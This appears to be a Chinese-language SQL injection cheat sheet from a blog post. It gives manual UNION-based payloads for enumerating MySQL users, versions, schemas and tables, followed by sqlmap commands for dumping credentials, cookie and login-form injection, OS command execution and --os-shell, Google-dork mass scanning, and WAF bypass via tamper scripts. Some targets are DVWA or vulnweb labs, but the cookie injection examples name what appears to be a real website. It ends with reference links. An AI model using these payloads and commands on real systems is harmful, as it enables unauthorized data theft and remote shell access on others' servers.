基础
1' order by 2 -- /*用来猜解查询信息的列数
1' and 1=2 union select user(),database(),--
1' and 1=2 union select user(),version(), -- /*利用user(),database(),version()函数获得数据库信息
1'and 1=2 union select 1,@@global.version_compile_os from mysql.user -- /*获得操作系统信息1' and ord(mid(user(),1,1))=114 -- /*测试连接数据库用户权限
1' and 1=2 union select 1,schema_name from information_schema.schemata -- /*爆出所有数据库名称1' and exists(select * from users) -- /*猜解表名
1' and exists(select first_name from users) -- /猜解字段名
1' and 1=2 union select first_name,last_name from users -- /*猜解字段内容
用SQLMAP测试语句:
一、通用操作步骤
sqlmap -u http://111 --dbs 获取数据库
sqlmap -u http://111 -D dababasename --tables 获取表名
sqlmap -u http://111 -D databasename -T tablename --columns 获取字段
sqlmap -u http://111 -D databasename -T tablename -C id,user,password --dump 获取字段信息
二、cookie注入
sqlmap -u "http://www.ntjx.org/jsj/DownloadShow.asp" --cookie "id=9" --table --level 2 用cookie进行注入
sqlmap -u "http://www.ntjx.org/jsj/DownloadShow.asp" --cookie "id=9" --columns --level 2
三、POST登陆框注入
1.可以结合burpsuit
sqlmap.py -r search-test.txt -p tfUPass
2. sqlmap -u http://testasp.vulnweb.com/Login.asp --forms
3. sqlmap -u http://testasp.vulnweb.com/Login.asp --data "tfUName=1&tfUPass=1"
四、命令执行
sqlmap -u http://testasp.vulnweb.com/Login.asp --os-cmd=ipconfig
sqlmap -u http://testasp.vulnweb.com/Login.asp --os-shell
五、伪静态注入
sqlmap -u http://sfle.y.com/index/40*.html -D dababasename --tables 获取表名
六、请求延时
sqlmap -u http://sfle.y.com/index/40*.html --delay 1 隔一段时间访问正常页面
sqlmap -u http://sfle.y.com/index/40*.html --safe-freq 20
七、注入搜索扫描
sqlmap -g inurl:php?id=1
八、绕过WAF防火墙
sqlmap -u http://192.168.159.1/news.php?id=1 -v 3 --dbs --batch --tamper "space2morehash.py"
space2hash.py base64encode.py charencode.py
F:\Pentest\software\测试软件\sqlmap>python sqlmap.py -u "http://192.168.1.204/dvwa/vulnerabilities/sqli/index.php ?Submit=Submit#" --data "id=1" --cookie "security=low; PHPSESSID=2ct43q8u003g4fjm1o6jrjmbc7"
./sqlmap -u "http://192.168.0.4/dvwa/vulnerabilities/sqli_blind/?id='&Submit=Submit" --cookie="security=low;PHPSESSID=s92rvhil24kuqfqiugavahbp53" --dbs
root@snow:/home/tools/sqlmap# python sqlmap.py -u "http://192.168.1.8/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --dump -C "user,password" -T "users" -D "dvwa" --cookie="PHPSESSID=jpmr41rhv6ljlidrquhc4ajm11; security=low"
sqlmap插件
http://www.nbhkdz.com/read/c29b1ebe40070202252880f7.html
linux
视频
http://v.ku6.com/show/-Xto249em6PeIFD0fe0Z3w...html?from=my
用法
http://www.cnblogs.com/im404/p/3505894.html
http://hi.baidu.com/sy_chengzhe/item/c9d332fab406a442932af203
http://www.hack44.cn/search.asp?word=%D0%A1%B5%CF&m=2&ChannelID=0&page=3
http://drops.wooyun.org/tips/143
http://www.2cto.com/Article/201209/153909.html
http://drops.wooyun.org/tips/401
http://hanhp.blog.51cto.com/8475416/1351106
dvwa注入
http://www.loveautumn.com/text/sqlmap1.html
http://blog.sina.com.cn/s/blog_8cc77f5e0101lo6c.html
http://blog.csdn.net/v0dga/article/details/7545066
http://www.freebuf.com/articles/1000.html
http://www.loveautumn.com/text/sqlmap_tamper.html temp大全
***
http://www.freebuf.com/articles/4184.html
http://apriliscc.blog.163.com/blog/static/22747009320139309351453/
99
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
